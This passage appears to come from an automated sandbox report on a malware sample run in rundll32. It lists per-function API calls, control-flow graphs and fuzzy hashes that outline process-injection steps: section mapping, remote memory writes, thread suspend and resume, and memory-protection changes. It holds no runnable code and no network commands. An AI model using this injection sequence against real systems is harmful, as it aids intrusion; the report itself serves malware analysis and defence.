446->445 447 5946ff1-5946ff7 call 5942bfd 446->447 452 5946ffc 447->452 449->428 451 594701e-5947042 memcpy call 5944837 449->451 454 5947047-594704c 451->454 452->449 454->428 455 594704e-5947053 454->455 455->428 456 5947055-5947058 455->456 456->428
                              APIs
                              • memcpy.NTDLL(?,?,?,0593C71A,?,?,?,?,?,0593C71A,?,?,00000000), ref: 05946F59
                                • Part of subcall function 0593C4FB: GetModuleHandleA.KERNEL32(?,?,?,05947017,?,?,?,00000000), ref: 0593C539
                                • Part of subcall function 0593C4FB: memcpy.NTDLL(?,0595A30C,00000018,?,?,?), ref: 0593C5B5
                              • memcpy.NTDLL(?,?,00000018,0593C71A,?,?,?,?,?,0593C71A,?,?,00000000), ref: 05946FA7
                              • memcpy.NTDLL(?,0594DD8F,00000800,?,?,?,00000000), ref: 0594702A
                              • NtUnmapViewOfSection.NTDLL(000000FF,00000000,?,00000000), ref: 05947068
                              • NtClose.NTDLL(00000000,?,00000000), ref: 0594708F
                                • Part of subcall function 05948F62: GetModuleHandleA.KERNEL32(?,00000020,?,00008664,?,0593C71A,0593C71A,?,05946EFA,?,0593C71A,?,?,00000000), ref: 05948F87
                                • Part of subcall function 05948F62: GetProcAddress.KERNEL32(00000000,?), ref: 05948FA9
                                • Part of subcall function 05948F62: GetProcAddress.KERNEL32(00000000,?), ref: 05948FBF
                                • Part of subcall function 05948F62: GetProcAddress.KERNEL32(00000000,?), ref: 05948FD5
                                • Part of subcall function 05948F62: GetProcAddress.KERNEL32(00000000,?), ref: 05948FEB
                                • Part of subcall function 05948F62: GetProcAddress.KERNEL32(00000000,?), ref: 05949001
                                • Part of subcall function 0594BE80: NtMapViewOfSection.NTDLL(00000000,000000FF,0593717E,00000000,00000000,0593717E,?,00000002,00000000,?,0593C71A,00000000,0593717E,000000FF,?), ref: 0594BEAE
                                • Part of subcall function 05941CE4: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,0593C71A,?,?,00000000), ref: 05941D58
                                • Part of subcall function 05941CE4: memcpy.NTDLL(?,?,?), ref: 05941DBF
                              • memset.NTDLL ref: 059470AA
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: memcpy$AddressProc$HandleModuleSectionView$CloseUnmapmemset
                              • String ID:
                              • API String ID: 3674896251-0
                              • Opcode ID: 4d57ea997b8f353da5ee071459182ee9e7bb78285ec24822628e387e74d3f9ae
                              • Instruction ID: d0c0d220dd0360e1c380d55815de9a63bfb808552ae5cc9a2ce1211d03cac9b2
                              • Opcode Fuzzy Hash: 4d57ea997b8f353da5ee071459182ee9e7bb78285ec24822628e387e74d3f9ae
                              • Instruction Fuzzy Hash: 96A13AB1A0120AEFDF11DFA8C884EAEBBB9FF05304F104569E905A7251E731AE55CF90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 05942331 Relevance: 9.1, APIs: 6, Instructions: 94threadmemorynativeCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 492 5942331-594234b 493 5942355 492->493 494 594234d-5942353 492->494 495 5942358-5942376 GetSystemTimeAsFileTime HeapCreate 493->495 494->495 496 594237d-594239b call 5940818 495->496 497 5942378-594237b 495->497 499 59423e2-59423e5 496->499 504 594239d-59423a9 call 593c7b6 496->504 497->499 500 5942424-594242a 499->500 501 59423e7-59423fd NtQueryInformationThread 499->501 501->500 503 59423ff-5942411 GetModuleHandleA RtlImageNtHeader 501->503 503->500 505 5942413-594241b 503->505 504->499 509 59423ab-59423bf call 593a698 504->509 505->500 507 594241d-594241e RtlExitUserThread 505->507 507->500 509->499 512 59423c1-59423d0 call 594212c 509->512 515 59423d2 512->515 516 59423d8-59423db call 5938fec 512->516 515->516 518 59423e0 516->518 518->499
                              APIs
                              • GetSystemTimeAsFileTime.KERNEL32(?), ref: 0594235C
                              • HeapCreate.KERNEL32(00000000,00400000,00000000), ref: 05942369
                              • NtQueryInformationThread.NTDLL(000000FE,00000009,?,00000004,?), ref: 059423F5
                              • GetModuleHandleA.KERNEL32(00000000), ref: 05942400
                              • RtlImageNtHeader.NTDLL(00000000), ref: 05942409
                              • RtlExitUserThread.NTDLL(00000000), ref: 0594241E
                                • Part of subcall function 05940818: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,05942397,?), ref: 05940820
                                • Part of subcall function 05940818: GetVersion.KERNEL32 ref: 0594082F
                                • Part of subcall function 05940818: GetCurrentProcessId.KERNEL32 ref: 0594084B
                                • Part of subcall function 05940818: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 05940868
                                • Part of subcall function 0593C7B6: memcpy.NTDLL(00000000,?,?,?,?,?,?,?), ref: 0593C815
                                • Part of subcall function 0593A698: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000208,00000000,00000000,?,?,05937D5E), ref: 0593A6BE
                                • Part of subcall function 0594212C: GetModuleHandleA.KERNEL32(?,?,?,?,?,0593111D,00000000), ref: 0594214D
                                • Part of subcall function 0594212C: GetProcAddress.KERNEL32(00000000,?), ref: 05942166
                                • Part of subcall function 0594212C: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,0593111D,00000000), ref: 05942183
                                • Part of subcall function 0594212C: IsWow64Process.KERNEL32(?,?,?,?,?,?,0593111D,00000000), ref: 05942194
                                • Part of subcall function 0594212C: FindCloseChangeNotification.KERNEL32(?,?,?,?,0593111D,00000000), ref: 059421A7
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process$Module$CreateFileHandleOpenThreadTime$AddressChangeCloseCurrentEventExitFindHeaderHeapImageInformationNameNotificationProcQuerySystemUserVersionWow64memcpy
                              • String ID:
                              • API String ID: 2581485877-0
                              • Opcode ID: 1d9f43e782bd6ca4e31c7dd25d8efa3ffa9ce42ad8480c92a24f9c0d94f3921c
                              • Instruction ID: a38f1b5f60004a829b62a1c8725d6fcdd296cbdc27b09dc5293b1394fafd089f
                              • Opcode Fuzzy Hash: 1d9f43e782bd6ca4e31c7dd25d8efa3ffa9ce42ad8480c92a24f9c0d94f3921c
                              • Instruction Fuzzy Hash: 6931BF75A04218AFCB22EF74DC89E6EBBB9FB84750F514124F506EB201DB349D44CBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0593710A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71nativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,76C84EE0,00000000,00000000), ref: 05937167
                                • Part of subcall function 0594BE80: NtMapViewOfSection.NTDLL(00000000,000000FF,0593717E,00000000,00000000,0593717E,?,00000002,00000000,?,0593C71A,00000000,0593717E,000000FF,?), ref: 0594BEAE
                              • memset.NTDLL ref: 0593718B
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Section$CreateViewmemset
                              • String ID: @
                              • API String ID: 2533685722-2766056989
                              • Opcode ID: 04c01abe87f767a248b9930281d971bf0f910e73e3e0dd3ac0084e908f5bf650
                              • Instruction ID: 0278438e25e6bd50676a342f579078be5bf545b6205fd8b7a215b271876c0160
                              • Opcode Fuzzy Hash: 04c01abe87f767a248b9930281d971bf0f910e73e3e0dd3ac0084e908f5bf650
                              • Instruction Fuzzy Hash: 17210BB6D00209AFDB11DFE9C8859EFFBB9EB48354F104529E616F3250D730AA448FA1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 059461AE Relevance: 4.7, APIs: 3, Instructions: 168librarynativeloaderCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcAddress.KERNEL32(?,00000318), ref: 059461D3
                              • NtWow64QueryInformationProcess64.NTDLL(00000000,00000000,?,00000030,00000000), ref: 059461EF
                                • Part of subcall function 05939394: RtlAllocateHeap.NTDLL(00000000,?,05940051), ref: 059393A0
                                • Part of subcall function 0594A806: GetProcAddress.KERNEL32(?,00000000), ref: 0594A82F
                                • Part of subcall function 0594A806: NtWow64ReadVirtualMemory64.NTDLL(00000100,?,?,00000028,00000000,00000000,00000100,00000000,?,?,?,05946230,00000000,00000000,00000028,00000100), ref: 0594A851
                              • StrRChrA.SHLWAPI(00000018,00000000,0000005C,00000000,00000318,?,00000000,00000068,00000098,00000000,00000028,00000040,00000000,00000000,00000028,00000100), ref: 05946359
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProcWow64$AllocateHeapInformationMemory64Process64QueryReadVirtual
                              • String ID:
                              • API String ID: 3547194813-0
                              • Opcode ID: 8314240149ef92f7bfda9d52b2870ed91625cc1adf32feda639cf46b65e09979
                              • Instruction ID: a3ad1f7168788b4cb8be5dcf906e31ed84d3f27e93aab28a6cab39205c704d41
                              • Opcode Fuzzy Hash: 8314240149ef92f7bfda9d52b2870ed91625cc1adf32feda639cf46b65e09979
                              • Instruction Fuzzy Hash: 1D613CB1A0424AABDF15CFA4C880FAEBBB9FF49704F004129E905A7241DB74ED54CFA4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 05940782 Relevance: 4.6, APIs: 3, Instructions: 56librarynativeloaderCOMMON
                              Download Yara Rule
                              APIs
                              • memset.NTDLL ref: 05940796
                              • GetProcAddress.KERNEL32(?), ref: 059407BE
                              • NtWow64QueryInformationProcess64.NTDLL(?,00000000,?,00000030,00000000,?,00001000,00000000), ref: 059407DC
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressInformationProcProcess64QueryWow64memset
                              • String ID:
                              • API String ID: 2968673968-0
                              • Opcode ID: 2a59c68cc86499d990932f64b3271bd4a68865403b6e09539dec893519d54206
                              • Instruction ID: d02d24b81ae0f73c7bdc3da41bd385ea29e5e11b77b63e83a8ddca4abf5d9c37
                              • Opcode Fuzzy Hash: 2a59c68cc86499d990932f64b3271bd4a68865403b6e09539dec893519d54206
                              • Instruction Fuzzy Hash: 0811A331A14219AFDB00CB94DD09F99BBA9EB44700F054024F904EF280DB70ED15CFA4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 05947950 Relevance: 4.5, APIs: 3, Instructions: 29memorynativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtAllocateVirtualMemory.NTDLL(0594EB0F,00000000,00000000,0594EB0F,00003000,00000040), ref: 05947981
                              • RtlNtStatusToDosError.NTDLL(00000000), ref: 05947988
                              • SetLastError.KERNEL32(00000000), ref: 0594798F
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Error$AllocateLastMemoryStatusVirtual
                              • String ID:
                              • API String ID: 722216270-0
                              • Opcode ID: 11ec697bb79ad78ee33b3ef726373f58959ae9771401fa99f086c55fa062bc8b
                              • Instruction ID: 0dc46071d8a9baf0698afe7eb45bd09ed1736c32757ee067bd3bf843c733b413
                              • Opcode Fuzzy Hash: 11ec697bb79ad78ee33b3ef726373f58959ae9771401fa99f086c55fa062bc8b
                              • Instruction Fuzzy Hash: 49F0FEB1525309FBEB05CBD5D90AFAEBBBCEB44359F104048F605A6180EBB4EB14DB64
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 05945312 Relevance: 4.5, APIs: 3, Instructions: 26nativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtWriteVirtualMemory.NTDLL(?,00000004,00000000,00000000,?,76C86780,?,0594907F,?,00000004,00000000,00000004,?), ref: 05945330
                              • RtlNtStatusToDosError.NTDLL(C0000002), ref: 0594533F
                              • SetLastError.KERNEL32(00000000,?,0594907F,?,00000004,00000000,00000004,?,?,?,?,0593C691,?,00000000,CCCCFEEB,?), ref: 05945346
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Error$LastMemoryStatusVirtualWrite
                              • String ID:
                              • API String ID: 1089604434-0
                              • Opcode ID: 8fc1e9888bb24bbb2692614e4ee0187ca92cc6e5e2593486a63bcdfbdf32b4d2
                              • Instruction ID: c0085c9ef5ddd18687ebb700848a057afd123dbd2dc26c531dea05a2998a8eeb
                              • Opcode Fuzzy Hash: 8fc1e9888bb24bbb2692614e4ee0187ca92cc6e5e2593486a63bcdfbdf32b4d2
                              • Instruction Fuzzy Hash: 99E01A3220821AEBCF015EE8AC05D9EBF69FB08740B014010FE01D2121DB71DC31EBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0594A806 Relevance: 3.0, APIs: 2, Instructions: 35librarynativeloaderCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcAddress.KERNEL32(?,00000000), ref: 0594A82F
                              • NtWow64ReadVirtualMemory64.NTDLL(00000100,?,?,00000028,00000000,00000000,00000100,00000000,?,?,?,05946230,00000000,00000000,00000028,00000100), ref: 0594A851
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressMemory64ProcReadVirtualWow64
                              • String ID:
                              • API String ID: 752694512-0
                              • Opcode ID: 22592f7e6e02f85d8f3162eedbd9b7859fc0cb39f97674eccea76fabfd6a50ad
                              • Instruction ID: a121661c2711d153d56be57180a00a04c5b596c9712ee8d43155c7492a5b7123
                              • Opcode Fuzzy Hash: 22592f7e6e02f85d8f3162eedbd9b7859fc0cb39f97674eccea76fabfd6a50ad
                              • Instruction Fuzzy Hash: 24F0F476614209BFCB128F99DD45C9AFFBAFB88711B544219F905C3220EA71E962DB20
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0594BE80 Relevance: 1.5, APIs: 1, Instructions: 34nativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtMapViewOfSection.NTDLL(00000000,000000FF,0593717E,00000000,00000000,0593717E,?,00000002,00000000,?,0593C71A,00000000,0593717E,000000FF,?), ref: 0594BEAE
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: SectionView
                              • String ID:
                              • API String ID: 1323581903-0
                              • Opcode ID: 2cd136b18fd47c29f94374b8f148c9a9c123cd50275110905b50dafc155aad11
                              • Instruction ID: 8f8c68f813a4492b5ab536cba04fc10cc550a462c6979a9a29f40ef9362b7378
                              • Opcode Fuzzy Hash: 2cd136b18fd47c29f94374b8f148c9a9c123cd50275110905b50dafc155aad11
                              • Instruction Fuzzy Hash: 52F012B690420CFFDB119FA5CC85CDFBBBDEB44244B008C29F642D1050D231DE189B60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 059374AE Relevance: 1.5, APIs: 1, Instructions: 33nativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtQueryInformationProcess.NTDLL(00000000,?,00000018,00000000,0595A400), ref: 059374C5
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: InformationProcessQuery
                              • String ID:
                              • API String ID: 1778838933-0
                              • Opcode ID: 1bb03a8f941c7251900cdeb89a2179caec6b3f7e63bfc0c8851ee4c3c5a8f2bb
                              • Instruction ID: 81618d2cc4bcf5430c363bbb44cad5bb343c04311991058148554b47a9ef4654
                              • Opcode Fuzzy Hash: 1bb03a8f941c7251900cdeb89a2179caec6b3f7e63bfc0c8851ee4c3c5a8f2bb
                              • Instruction Fuzzy Hash: E2F09A71704114DB8B20CB99D88AEABBFAAFB053907004510E901DB220E220FA01CBE0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 059334FF Relevance: 21.1, APIs: 14, Instructions: 126memorysynchronizationCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 100 59334ff-5933510 101 5933512-593351e call 5931268 call 594e869 100->101 102 5933564-593356f 100->102 116 5933524-5933531 SleepEx 101->116 104 5933571 call 5939e82 102->104 105 5933576-5933588 call 5942650 102->105 104->105 111 593358a-5933597 ReleaseMutex CloseHandle 105->111 112 5933599-59335a0 105->112 111->112 114 59335a2-59335af ResetEvent CloseHandle 112->114 115 59335b1-59335be SleepEx 112->115 114->115 115->115 117 59335c0 115->117 116->116 118 5933533-593353a 116->118 119 59335c5-59335d2 SleepEx 117->119 120 5933550-5933562 RtlDeleteCriticalSection * 2 118->120 121 593353c-5933542 118->121 122 59335d4-59335d9 119->122 123 59335db-59335e2 119->123 120->102 121->120 124 5933544-593354b call 594e803 121->124 122->119 122->123 125 59335f3-59335fa 123->125 126 59335e4-59335ed HeapFree 123->126 124->120 128 5933602-5933608 125->128 129 59335fc-59335fd call 59483fa 125->129 126->125 130 593360a-5933611 128->130 131 5933619-5933620 128->131 129->128 130->131 133 5933613-5933615 130->133 134 5933622-5933623 RtlRemoveVectoredExceptionHandler 131->134 135 5933629-593362f 131->135 133->131 134->135 136 5933631 call 5939131 135->136 137 5933636 135->137 136->137 139 593363b-5933648 SleepEx 137->139 140 5933651-593365a 139->140 141 593364a-593364f 139->141 142 5933672-5933682 LocalFree 140->142 143 593365c-5933661 140->143 141->139 141->140 143->142 144 5933663 143->144 145 5933666-5933670 FindCloseChangeNotification 144->145 145->142 145->145
                              APIs
                              • SleepEx.KERNEL32(00000064,00000001,00000000,?,?,?,0594E846), ref: 05933528
                              • RtlDeleteCriticalSection.NTDLL(0595A3E0), ref: 0593355B
                              • RtlDeleteCriticalSection.NTDLL(0595A400), ref: 05933562
                              • ReleaseMutex.KERNEL32(0000059C,00000000,?,?,?,0594E846), ref: 0593358B
                              • CloseHandle.KERNEL32(?,?,0594E846), ref: 05933597
                              • ResetEvent.KERNEL32(00000000,00000000,?,?,?,0594E846), ref: 059335A3
                              • CloseHandle.KERNEL32(?,?,0594E846), ref: 059335AF
                              • SleepEx.KERNEL32(00000064,00000001,00000000,?,?,?,0594E846), ref: 059335B5
                              • SleepEx.KERNEL32(00000064,00000001,?,?,0594E846), ref: 059335C9
                              • HeapFree.KERNEL32(00000000,00000000,?,?,0594E846), ref: 059335ED
                              • RtlRemoveVectoredExceptionHandler.NTDLL(057505B8), ref: 05933623
                              • SleepEx.KERNEL32(00000064,00000001,?,?,0594E846), ref: 0593363F
                              • FindCloseChangeNotification.KERNEL32(05F3F2C0,?,?,0594E846), ref: 05933668
                              • LocalFree.KERNEL32(?,?,0594E846), ref: 05933678
                                • Part of subcall function 05931268: GetVersion.KERNEL32(?,?,76CDF720,?,05933517,00000000,?,?,?,0594E846), ref: 0593128C
                                • Part of subcall function 05931268: GetModuleHandleA.KERNEL32(?,05F397B5,?,76CDF720,?,05933517,00000000,?,?,?,0594E846), ref: 059312A9
                                • Part of subcall function 05931268: GetProcAddress.KERNEL32(00000000), ref: 059312B0
                                • Part of subcall function 0594E869: RtlEnterCriticalSection.NTDLL(0595A400), ref: 0594E873
                                • Part of subcall function 0594E869: RtlLeaveCriticalSection.NTDLL(0595A400), ref: 0594E8AF
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: CriticalSectionSleep$CloseHandle$DeleteFree$AddressChangeEnterEventExceptionFindHandlerHeapLeaveLocalModuleMutexNotificationProcReleaseRemoveResetVectoredVersion
                              • String ID:
                              • API String ID: 1047430009-0
                              • Opcode ID: 32ec932a09ecee9399ed671b3a4602e63cebb80911b945e6a979044ae9440597
                              • Instruction ID: 79dc709662cbbd1c72967e3830b89eabd17185059ff7a2cf1a99dac99fb0fdef
                              • Opcode Fuzzy Hash: 32ec932a09ecee9399ed671b3a4602e63cebb80911b945e6a979044ae9440597
                              • Instruction Fuzzy Hash: F9417F31768301DFDB20AF75EA8BA19BFADBB40756B810525F606D7250DF70E860CB54
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 05931A0A Relevance: 15.1, APIs: 10, Instructions: 117memorystringCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 146 5931a0a-5931a2b call 5953d64 149 5931a31-5931a32 146->149 150 5931b0d 146->150 151 5931a34-5931a37 149->151 152 5931a98-5931a9f 149->152 153 5931b13-5931b22 VirtualProtect 150->153 156 5931b64-5931b70 call 5953d9f 151->156 157 5931a3d 151->157 154 5931aa1-5931aa8 152->154 155 5931ae0-5931af5 VirtualProtect 152->155 158 5931b24-5931b3a VirtualProtect 153->158 159 5931b3f-5931b45 GetLastError 153->159 154->155 161 5931aaa-5931ab6 154->161 155->153 163 5931af7-5931b0b 155->163 160 5931a43-5931a4a 157->160 158->160 159->156 164 5931a8c-5931a93 160->164 165 5931a4c-5931a50 160->165 161->153 166 5931ab8-5931ac5 VirtualProtect 161->166 168 5931adc-5931ade VirtualProtect 163->168 164->156 165->164 169 5931a52-5931a6e lstrlen VirtualProtect 165->169 166->153 170 5931ac7-5931adb 166->170 168->153 169->164 171 5931a70-5931a8a lstrcpy VirtualProtect 169->171 170->168 171->164
                              APIs
                              • lstrlen.KERNEL32(?,?,00000000,?,059519C5,059594D8,?,?,00000004,00000000,?,00000000,05950977,0594893A,?,?), ref: 05931A58
                              • VirtualProtect.KERNEL32(00000000,00000000,00000040,-0000001C,?,00000000,?,059519C5,059594D8,?,?,00000004,00000000,?,00000000,05950977), ref: 05931A6A
                              • lstrcpy.KERNEL32(00000000,?), ref: 05931A79
                              • VirtualProtect.KERNEL32(00000000,00000000,?,-0000001C,?,00000000,?,059519C5,059594D8,?,?,00000004,00000000,?,00000000,05950977), ref: 05931A8A
                              • VirtualProtect.KERNEL32(00000001,00000005,00000040,-0000001C,05956040,00000018,059334DB,?,00000000,?,059519C5,059594D8,?,?,00000004,00000000), ref: 05931AC1
                              • VirtualProtect.KERNEL32(?,00000004,?,-0000001C,?,00000000,?,059519C5,059594D8,?,?,00000004,00000000,?,00000000,05950977), ref: 05931ADC
                              • VirtualProtect.KERNEL32(?,00000004,00000040,-0000001C,05956040,00000018,059334DB,?,00000000,?,059519C5,059594D8,?,?,00000004,00000000), ref: 05931AF1
                              • VirtualProtect.KERNEL32(?,00000004,00000040,-0000001C,05956040,00000018,059334DB,?,00000000,?,059519C5,059594D8,?,?,00000004,00000000), ref: 05931B1E
                              • VirtualProtect.KERNEL32(?,00000004,?,-0000001C,?,00000000,?,059519C5,059594D8,?,?,00000004,00000000,?,00000000,05950977), ref: 05931B38
                              • GetLastError.KERNEL32(?,00000000,?,059519C5,059594D8,?,?,00000004,00000000,?,00000000,05950977,0594893A,?,?), ref: 05931B3F
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: ProtectVirtual$ErrorLastlstrcpylstrlen
                              • String ID:
                              • API String ID: 3676034644-0
                              • Opcode ID: d8ad3afa492640a5c86ed6626e4e4190fb05609bfca9ecbc2e1902fe7f7a6467
                              • Instruction ID: d476eef4a62e817fae2a2bca368420b485589fa90087f23da232f36def987b4a
                              • Opcode Fuzzy Hash: d8ad3afa492640a5c86ed6626e4e4190fb05609bfca9ecbc2e1902fe7f7a6467
                              • Instruction Fuzzy Hash: E6416C71A04709DFDB20CFA0CC46EABBBB9FB48310F018519E656A65A0E734E815DF20
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0593C5C4 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 125threadsynchronizationinjectionCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 172 593c5c4-593c609 memset call 594212c 175 593c6f5-593c6fc 172->175 176 593c60f 172->176 177 593c702-593c705 call 594ed07 175->177 178 593c616-593c61e 175->178 176->178 184 593c70a 177->184 180 593c620-593c637 call 5946de0 178->180 181 593c63d-593c64f 178->181 180->181 190 593c73c-593c740 180->190 182 593c651-593c658 call 59314c6 181->182 183 593c65b-593c672 call 5945220 181->183 182->183 195 593c734 GetLastError 183->195 196 593c678-593c67c 183->196 189 593c73a 184->189 189->190 193 593c742 190->193 194 593c74b-593c751 190->194 193->194 195->189 197 593c682-593c693 call 5949048 196->197 198 593c72d-593c732 196->198 197->195 201 593c699 197->201 198->190 202 593c69e-593c6ba WaitForSingleObject 201->202 204 593c6bf-593c6e2 SuspendThread call 59336bb 202->204 205 593c6bc-593c6be 202->205 208 593c6e4-593c6e7 204->208 209 593c6e9-593c6ec 204->209 205->204 208->202 208->209 210 593c6ee-593c6f3 209->210 211 593c70c-593c71a call 5946de0 209->211 212 593c71c-593c72b call 5949048 210->212 211->212 212->190
                              APIs
                              • memset.NTDLL ref: 0593C5E7
                                • Part of subcall function 0594212C: GetModuleHandleA.KERNEL32(?,?,?,?,?,0593111D,00000000), ref: 0594214D
                                • Part of subcall function 0594212C: GetProcAddress.KERNEL32(00000000,?), ref: 05942166
                                • Part of subcall function 0594212C: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,0593111D,00000000), ref: 05942183
                                • Part of subcall function 0594212C: IsWow64Process.KERNEL32(?,?,?,?,?,?,0593111D,00000000), ref: 05942194
                                • Part of subcall function 0594212C: FindCloseChangeNotification.KERNEL32(?,?,?,?,0593111D,00000000), ref: 059421A7
                              • ResumeThread.KERNEL32(00000004,?,00000000,CCCCFEEB,?,00000000,00000000,00000004,?,00000000,00000000,76C84EE0,00000000), ref: 0593C6A1
                              • WaitForSingleObject.KERNEL32(00000064), ref: 0593C6AF
                              • SuspendThread.KERNEL32(00000004), ref: 0593C6C2
                                • Part of subcall function 05946DE0: memset.NTDLL ref: 059470AA
                              • ResumeThread.KERNEL32(00000004), ref: 0593C745
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Thread$ProcessResumememset$AddressChangeCloseFindHandleModuleNotificationObjectOpenProcSingleSuspendWaitWow64
                              • String ID: v
                              • API String ID: 2397206891-1801730948
                              • Opcode ID: d9cb9b035ac894da3f3906efb30511c05224f7de7eb3174149dca1206eb5cad1
                              • Instruction ID: ccaa2ec74f244840912bee9b025fa8cbb5d609aacd843e4b97eb5e5fc552989f
                              • Opcode Fuzzy Hash: d9cb9b035ac894da3f3906efb30511c05224f7de7eb3174149dca1206eb5cad1
                              • Instruction Fuzzy Hash: 10417A71A00609EFDB21AFA4CD8AEAE7FAAFF44354F144465F906A6110DB30DE51CF50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 05943959 Relevance: 10.7, APIs: 7, Instructions: 185registrysynchronizationprocessCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
